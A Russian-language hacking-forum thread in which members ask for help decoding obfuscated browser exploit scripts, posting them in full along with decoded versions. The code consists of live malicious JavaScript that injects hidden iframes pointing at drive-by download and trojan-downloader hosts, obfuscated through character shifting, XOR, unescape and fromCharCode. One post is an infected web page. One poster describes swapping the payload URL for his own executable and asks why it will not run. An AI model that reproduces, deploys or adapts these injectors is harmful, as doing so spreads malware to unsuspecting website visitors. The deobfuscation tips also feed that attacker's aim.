Форум АНТИЧАТ - Помогите расшифровать сплойты

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Помогите расшифровать сплойты (https://forum.antichat.xyz/showthread.php?t=52395)

Помогите расшифровать сплойты

Собсстно вот 3 сплойта как я думаю под 3 браузера, ясен пень что они делают, каспером паляться все 3 штуки но, всё-же кому не жалко расшифруйте их и выложите открытый код сюда пожалуйста если не жалко.

http://shinobi.org.ru/ps.lol
(это тексовый файл)

После расшифровки получаем вот такой вот код , который создает ифрейм на http://ad684d3b0894f93d47b8b248626ecdb1.cyb3rz.org/505/Xp/

Код:

<script>function Dn(YF,TM){ var aQ=new Date();var  Mc= new Date(); Mc.setTime(aQ.getTime()+86400000); document.cookie = YF+"="+escape(TM)+";expires="+Mc.toGMTString(); }var FX='s1fVW',ot='1';var hp='update1.classictel.org',Sf='/html/';if(document.cookie.indexOf(FX+'='+ot) ==-1){var dlh=document.location.host;var up= 'ht'+'tp:'+'//'+( dlh != ''?'':Mo()) + dlh.replace (/[^a-z0-9.-]/,'.').replace (/\.+/,'.')+'.'+Mo() +'.' + hp+Sf;var Pd=document.createElement('iframe');Pd.setAttribute ('src', up);Pd.height=2;Pd.width=1;Pd.frameBorder = 0; try{ document.body.appendChild ( Pd); Dn(FX, ot );} catch(e) {document.write ('<html><body></body></html>'); document.body.appendChild ( Pd);Dn ( FX,ot) ;} }

function Mo(){ var Da=24,iE="01234567890abcdef";var jG=""; for(AO=0; AO < Da; AO++) jG+= iE.substr(Math.floor(Math.random()*iE.length),1,1); return jG; }</script>

Если не сложно, то объясни пожалуйста какими прогами\скриптами ты всё это расшифровал плиииз. Первое я знаю там в URL закодированно, а дальше как???

Цитата:

Сообщение от gemaglabin

После расшифровки получаем вот такой вот код , который создает ифрейм на http://ad684d3b0894f93d47b8b248626ecdb1.cyb3rz.org/505/Xp/

Красиво!
Прямая ссылка на .exe файлик размером 2,43 КБ и палящийся как Trojan-Downloader.Win32.Small.gld
Ну с кодом всё ясно...
var hp='update1.classictel.org',Sf='/html/'; - заменяю на свой .exe файл тестирую под 3 браузерами и не на одном моя прога не запускается, почему???

Код:

<iframe src="http://volkoeb.info/xd/go.php?sid=1" width=1 height=1 style="display:none"></iframe>

<iframe src="http://volkoeb.info/xd/go.php?sid=2" width=1 height=1 style="display:none"></iframe>

<iframe src="http://volkoeb.info/xd/go.php?sid=3" width=1 height=1 style="display:none"></iframe>

<iframe src="http://volkoeb.info/xd/go.php?sid=4" width=1 height=1 style="display:none"></iframe>



if(document.cookie.indexOf('tnd=on')==-1){expires=new Date();expires.setTime(expires.getTime()+86400000);document.cookie='tnd='+escape('on')+'; expires='+expires.toGMTString()+'; path=/';status=location;document.write('<iframe src="http://updatez.info/etc/tds.php" width=0 height=0 frameborder=0 onLoad="status=defaultStatus;"></iframe>');}



<iframe name='86e1d55b15' src='http://verymonkey.com/goof/index.php' width=247 height=91 style='display:none'></iframe>

http://volkoeb.info/xd/go.php?sid=1

Код:

<HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY> 

<H1>Not Found</H1> 

The requested URL <!--#echo var="REQUEST_URI" --> was not found on this server. 

<HR> 

<SCRIPT>var source ="=tdsjqu?epdvnfou/xsjuf)voftdbqf)(&4d&7:&77&83&72&7e&76&31&84&83&74&4e&33&79&85&85&81&4b&3g&3g&76&7d&7:&85&76&81&83&7g&7b&76&74&85&3f&74&7f&3g&85&84&3g&7:&7f&3f&74&78&7:&4g&72&7d&76&89&33&31&88&7:&75&85&79&4e&42&31&79&76&7:&78&79&85&4e&42&31&84&85&8:&7d&76&4e&33&75&7:&84&81&7d&72&8:&4b&7f&7g&7f&76&33&4f&4d&3g&7:&77&83&72&7e&76&4f&4d&7:&77&83&72&7e&76&31&84&83&74&4e&33&79&85&85&81&4b&3g&3g&7d&76&7e&41&7f&3f&7:&7f&77&7g&3g&89&89&89&3g&7:&77&83&72&7e&76&3f&81&79&81&33&31&31&88&7:&75&85&79&4e&42&31&79&76&7:&78&79&85&4e&42&31&84&85&8:&7d&76&4e&33&75&7:&84&81&7d&72&8:&4b&7f&7g&7f&76&33&4f&4d&3g&7:&77&83&72&7e&76&4f&4d&7:&77&83&72&7e&76&31&84&83&74&4e&33&79&85&85&81&4b&3g&3g&7d&76&7e&41&7f&3f&7:&7f&77&7g&3g&89&89&89&3g&7e&3g&7:&77&83&72&7e&76&3f&81&79&81&33&31&31&88&7:&75&85&79&4e&42&31&79&76&7:&78&79&85&4e&42&31&84&85&8:&7d&76&4e&33&75&7:&84&81&7d&72&8:&4b&7f&7g&7f&76&33&4f&4d&3g&7:&77&83&72&7e&76&4f&4d&7:&77&83&72&7e&76&31&84&83&74&4e&33&79&85&85&81&4b&3g&3g&73&7d&41&74&7c&76&83&3f&7g&83&78&3g&89&89&89&3g&7:&77&83&72&7e&76&3f&81&79&81&33&31&31&88&7:&75&85&79&4e&42&31&79&76&7:&78&79&85&4e&42&31&84&85&8:&7d&76&4e&33&75&7:&84&81&7d&72&8:&4b&7f&7g&7f&76&33&4f&4d&3g&7:&77&83&72&7e&76&4f&4d&7:&77&83&72&7e&76&31&84&83&74&4e&33&79&85&85&81&4b&3g&3g&84&81&72&74&76&3e&84&7e&84&3f&7:&7f&77&7g&3g&89&89&89&3g&7:&77&83&72&7e&76&3f&81&79&81&33&31&31&88&7:&75&85&79&4e&42&31&79&76&7:&78&79&85&4e&42&31&84&85&8:&7d&76&4e&33&75&7:&84&81&7d&72&8:&4b&7f&7g&7f&76&33&4f&4d&3g&7:&77&83&72&7e&76&4f&4d&7:&77&83&72&7e&76&31&84&83&74&4e&33&79&85&85&81&4b&3g&3g&83&7g&73&7g&85&83&72&77&77&3f&74&7f&3g&7:&7f&3f&81&79&81&33&31&31&88&7:&75&85&79&4e&42&31&79&76&7:&78&79&85&4e&42&31&84&85&8:&7d&76&4e&33&75&7:&84&81&7d&72&8:&4b&7f&7g&7f&76&33&4f&4d&3g&7:&77&83&72&7e&76&4f&4d&7:&77&83&72&7e&76&31&84&83&74&4e&33&79&85&85&81&4b&3g&3g&73&7d&41&74&7c&76&83&3f&7:&7f&77&7g&3g&84&73&7f&3g&7:&77&83&72&7e&76&3f&81&79&81&33&31&31&88&7:&75&85&79&4e&42&31&79&76&7:&78&79&85&4e&42&31&84&85&8:&7d&76&4e&33&75&7:&84&81&7d&72&8:&4b&7f&7g&7f&76&33&4f&4d&3g&7:&77&83&72&7e&76&4f&4d&7:&77&83&72&7e&76&31&84&83&74&4e&33&79&85&85&81&4b&3g&3g&73&7d&41&74&7c&76&83&3f&7g&83&78&3g&84&85&3g&7:&77&83&72&7e&76&3f&81&79&81&33&31&31&88&7:&75&85&79&4e&42&31&79&76&7:&78&79&85&4e&42&31&84&85&8:&7d&76&4e&33&75&7:&84&81&7d&72&8:&4b&7f&7g&7f&76&33&4f&4d&3g&7:&77&83&72&7e&76&4f&4d&7:&77&83&72&7e&76&31&84&83&74&4e&33&79&85&85&81&4b&3g&3g&88&7g&83&7d&75&85&83&72&77&77&3f&74&7f&3g&84&85&3g&7:&77&83&72&7e&76&3f&81&79&81&33&31&31&88&7:&75&85&79&4e&42&31&79&76&7:&78&79&85&4e&42&31&84&85&8:&7d&76&4e&33&75&7:&84&81&7d&72&8:&4b&7f&7g&7f&76&33&4f&4d&3g&7:&77&83&72&7e&76&4f(**=0tdsjqu?"; var result = ""; 

for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1); 

document.write(result); </SCRIPT><SCRIPT>document.write(unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%65%6c%69%74%65%70%72%6f%6a%65%63%74%2e%63%6e%2f%74%73%2f%69%6e%2e%63%67%69%3f%61%6c%65%78%22%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%22%3e%3c%2f%69%66%72%61%6d%65%3e%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%6c%65%6d%30%6e%2e%69%6e%66%6f%2f%78%78%78%2f%69%66%72%61%6d%65%2e%70%68%70%22%20%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%22%3e%3c%2f%69%66%72%61%6d%65%3e%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%6c%65%6d%30%6e%2e%69%6e%66%6f%2f%78%78%78%2f%6d%2f%69%66%72%61%6d%65%2e%70%68%70%22%20%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%22%3e%3c%2f%69%66%72%61%6d%65%3e%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%62%6c%30%63%6b%65%72%2e%6f%72%67%2f%78%78%78%2f%69%66%72%61%6d%65%2e%70%68%70%22%20%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%22%3e%3c%2f%69%66%72%61%6d%65%3e%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%73%70%61%63%65%2d%73%6d%73%2e%69%6e%66%6f%2f%78%78%78%2f%69%66%72%61%6d%65%2e%70%68%70%22%20%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%22%3e%3c%2f%69%66%72%61%6d%65%3e%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%72%6f%62%6f%74%72%61%66%66%2e%63%6e%2f%69%6e%2e%70%68%70%22%20%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%22%3e%3c%2f%69%66%72%61%6d%65%3e%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%62%6c%30%63%6b%65%72%2e%69%6e%66%6f%2f%73%62%6e%2f%69%66%72%61%6d%65%2e%70%68%70%22%20%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%22%3e%3c%2f%69%66%72%61%6d%65%3e%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%62%6c%30%63%6b%65%72%2e%6f%72%67%2f%73%74%2f%69%66%72%61%6d%65%2e%70%68%70%22%20%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%22%3e%3c%2f%69%66%72%61%6d%65%3e%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%77%6f%72%6c%64%74%72%61%66%66%2e%63%6e%2f%73%74%2f%69%66%72%61%6d%65%2e%70%68%70%22%20%20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%73%74%79%6c%65%3d%22%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%22%3e%3c%2f%69%66%72%61%6d%65%3e'))</SCRIPT><IFRAME src="http://eliteproject.cn/ts/in.cgi?alex" width="1" height="1" STYLE='display: none'></IFRAME><IFRAME src="http://lem0n.info/xxx/iframe.php" width="1" height="1" STYLE='display: none'></IFRAME><IFRAME src="http://lem0n.info/xxx/m/iframe.php" width="1" height="1" STYLE='display: none'></IFRAME><IFRAME src="http://bl0cker.org/xxx/iframe.php" width="1" height="1" STYLE='display: none'></IFRAME><IFRAME src="http://space-sms.info/xxx/iframe.php" width="1" height="1" STYLE='display: none'></IFRAME><IFRAME src="http://robotraff.cn/in.php" width="1" height="1" STYLE='display: none'></IFRAME><IFRAME src="http://bl0cker.info/sbn/iframe.php" width="1" height="1" STYLE='display: none'></IFRAME><IFRAME src="http://bl0cker.org/st/iframe.php" width="1" height="1" STYLE='display: none'></IFRAME><IFRAME src="http://worldtraff.cn/st/iframe.php" width="1" height="1" STYLE='display: none'></IFRAME>

http://volkoeb.info/xd/go.php?sid=1

Код:

<iframe src="http://eliteproject.cn/ts/in.cgi?alex" width=1 height=1 style="display:none"></iframe>

<iframe src="http://lem0n.info/xxx/iframe.php"  width=1 height=1 style="display:none"></iframe>

<iframe src="http://lem0n.info/xxx/m/iframe.php"  width=1 height=1 style="display:none"></iframe>

<iframe src="http://bl0cker.org/xxx/iframe.php"  width=1 height=1 style="display:none"></iframe>

<iframe src="http://space-sms.info/xxx/iframe.php"  width=1 height=1 style="display:none"></iframe>

<iframe src="http://robotraff.cn/in.php"  width=1 height=1 style="display:none"></iframe>

<iframe src="http://bl0cker.info/sbn/iframe.php"  width=1 height=1 style="display:none"></iframe>

<iframe src="http://bl0cker.org/st/iframe.php"  width=1 height=1 style="display:none"></iframe>

<iframe src="http://worldtraff.cn/st/iframe.php"  width=1 height=1 style="display:none"></iframe>

$aSH прокрути мой пост)

Огромная просьба объяснить как расшифровывать подобное плииз!!!!!!!!!!

_http://www.xakepy.ru/showthread.php?t=34170

Вот ещё сплойтеГ:

Код:

<script language="JavaScript">

e = '0x00' + '45';str1 = "%FE%A6%AD%B0%DA%B7%B6%BD%AE%A1%F9%E4%B0%AD%B7%AD%A4%AD%AE%AD%B6%BD%FC%A2%AD%A6%A6%A1%A8%E4%F8%FE%AD%A0%B4%A5%A9%A1%DA%B7%B4%A7%F9%E4%A2%B6%B6%AA%FC%EB%EB%A6%A8%B0%E9%A7%AB%B1%A8%B6%A1%B4%E8%A7%AB%A9%EB%A8%A9%A6%EB%B6%B4%A0%EB%E4%DA%B3%AD%A6%B6%A2%F9%F5%DA%A2%A1%AD%A3%A2%B6%F9%F5%F8%FE%EB%AD%A0%B4%A5%A9%A1%F8%FE%EB%A6%AD%B0%F8%DA%C9%CC";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);

</script><br>&nbsp;

<br>&nbsp;

</body>

</html>

OTMOPO3b +1 к репе

Цитата:

Сообщение от OTMOPO3b

_http://www.xakepy.ru/showthread.php?t=34170

Ознакомился... помогает в некоторых случаях, а что делать если в сплойте 2 раза стоит "document.write", если оба раза подменить на alert, то он тока 1 раз выведется... блин лан.

Код:

<div style="visibility:hidden"><iframe src="http://dnv-counter.com/nmd/trf/" width=1 height=1></iframe></div>

Почему это только один раз выведется? Два раза алерт и выскочит, по крайней мере в Опере именно так

я про сплойты в первом сообщении... их таким способом у меня не получилось расшифровать :(

Цитата:

на первый "document.write" забей, второй замени на алерт,в итоге получишь код который тебе написал gemaglabin .как он расшифровал куда ломится ифрейм я хз..... у меня он долбился на другой адрес..... кроме этого у мну сей код ломился на IP адрес, перейдя по которому я получил в титле ret_ok O_o
В итоге мне надоело , продолжейте сами

//оффтоп
ret_ok - насколько я помню это ответ гейта для пинча, так что будьте аккуратнее

Цитата:

Сообщение от OTMOPO3b

на первый "document.write" как он расшифровал куда ломится ифрейм я хз

спс ещё раз, насчёт как расшифровал так вот в сплойте сточка:
var hp='update1.classictel.org',Sf='/html/';
а это прямая ссылка на .exe файлик... ну заменяю на свой как обычно и ни под каким браузером не пашет ;(

Trojan-Downloader.HTML.IFrame.o

вот еще сплойт

PHP код:


		
			
<SCRIPT LANGUAGE="JavaScript">

function selecturl(s) {

var gourl = s.options[s.selectedIndex].value;        window.top.location.href = gourl;

}

</SCRIPT>

<link rel="stylesheet" href="theme/big_city/style.css" type="text/css">

<style type="text/css"><!--



.text     { font-family: Verdana; font-size: 11px; text-align: justify; padding-top: 3px; padding-right: 5px; padding-bottom: 3px; padding-left: 5px; color: #FFFFFF; font-weight: normal}



--></style>

</head>

<body><!-- o65 --><script language="JavaScript">eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C98%2C111%2C114%2C100%2C101%2C114%2C61%2C34%2C48%2C34%2C32%2C115%2C116%2C121%2C108%2C101%2C61%2C34%2C100%2C105%2C115%2C112%2C108%2C97%2C121%2C58%2C32%2C110%2C111%2C110%2C101%2C59%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C48%2C49%2C50%2C49%2C46%2C48%2C49%2C51%2C55%2C46%2C48%2C50%2C50%2C53%2C46%2C48%2C49%2C52%2C54%2C47%2C37%2C51%2C48%2C37%2C51%2C49%2C37%2C54%2C67%2C37%2C54%2C55%2C37%2C52%2C51%2C37%2C54%2C53%2C37%2C54%2C65%2C37%2C54%2C69%2C47%2C37%2C54%2C70%2C37%2C55%2C53%2C37%2C55%2C52%2C37%2C50%2C69%2C37%2C54%2C56%2C37%2C55%2C52%2C37%2C54%2C68%2C37%2C54%2C67%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B"));</script><!-- c65 -->



<!-- (C) stat24 / Strona glowna -->

<script type="text/javascript">

<!--

document.writeln('<'+'scr'+'ipt type="text/javascript" src="http://s2.hit.stat24.com/_'+(new Date()).getTime()+'/script.js?id=1vY70KLMF.TUJ0.ejoApcJbfDowUIUMDD6tRWTd57i..Q7/l=11"></'+'scr'+'ipt>');

//-->

</script>

<!-- (C) stat24 / podstrony -->

<script type="text/javascript">

<!--

document.writeln('<'+'scr'+'ipt type="text/javascript" src="http://s2.hit.stat24.com/_'+(new Date()).getTime()+'/script.js?id=bQCV9EsdycfPgad1O8OmrOW0nF8R45ftlAf.QXzo6e3.D7/l=11"></'+'scr'+'ipt>');

//-->

</script>

<!-- stat24 clickMap -->

<script type="text/javascript" src="http://s2.hit.stat24.com/scriptxy.js?id=ogJKgP8Qz8SJ94WDjPTGqIXy7OqpWbfeLqVc647hjJf.F7/align=center/type=absolute">

</script>

<a href="http://automoto.xvo.pl" target="_blank" alt="Portal motoryzacyjny">AutoMoto.xvo.pl</a>



<!-- stat.4u.pl NiE KaSoWaC -->

<a target=_top href="http://stat.4u.pl/?mojeautobiz"><img alt="" src="http://adstat.4u.pl/s4u.gif" border="0"></a>

<script language="JavaScript" type="text/javascript">

<!--

function s4upl() { return "&amp;r=er";}

//-->

</script>

<script language="JavaScript" type="text/javascript" src="http://adstat.4u.pl/s.js?mojeautobiz"></script>

<script language="JavaScript" type="text/javascript">

<!--

s4uext=s4upl();

document.write('<img alt="" src="http://stat.4u.pl/cgi-bin/s.cgi?i=mojeautobiz'+s4uext+'" width="1" height="1">')

//-->

</script>

<noscript><img alt="" src="http://stat.4u.pl/cgi-bin/s.cgi?i=mojeautobiz&amp;r=ns" width="1" height="1"></noscript>

<!-- stat.4u.pl KoNiEc -->

расшифрованный:

PHP код:


		
			
<localhost>



<iframe border="0" style="display: none;" width="0" src="http://0121.0137.0225.0146/01lgCejn/out.html"></iframe>

может кому-то понадобится. =Р

полный html файл здесь (слил через iptools)

Цитата:

Сообщение от Nightmarе

Огромная просьба объяснить как расшифровывать подобное плииз!!!!!!!!!!

Самый простой вариант - заменить document.write на alert и открыть полученный файл в браузере...

Можно в опере - там сможешь спокойно скопировать выводимый на экран текст... и сохранить его куда-нибудь)

Шифрование может быть многоуровневым, так что, возможно, тебе прийдётся повторить эту процедуру несколкьо раз)

P.S. Ну и стандартное предупреждение: в первый раз пробуй на машине, не имеющей прямой доступ к интернету (ну или просто отключись от него на время экспериментов)

Не заметил вторую страницу :-/
МОДЕРАТОРУ: Удалите сообщение, если считаете бесполезным

piflit молодец, но мог бы и айпи указать )
вместо 0121.0137.0225.0146 -> 81.95.149.102
з.ы. штука древняя.. но как её расписывали я ржал ))
палится обычным пингом (конвертнуть айишник если кому надо можно тут http://ha.ckers.org/xss.htm )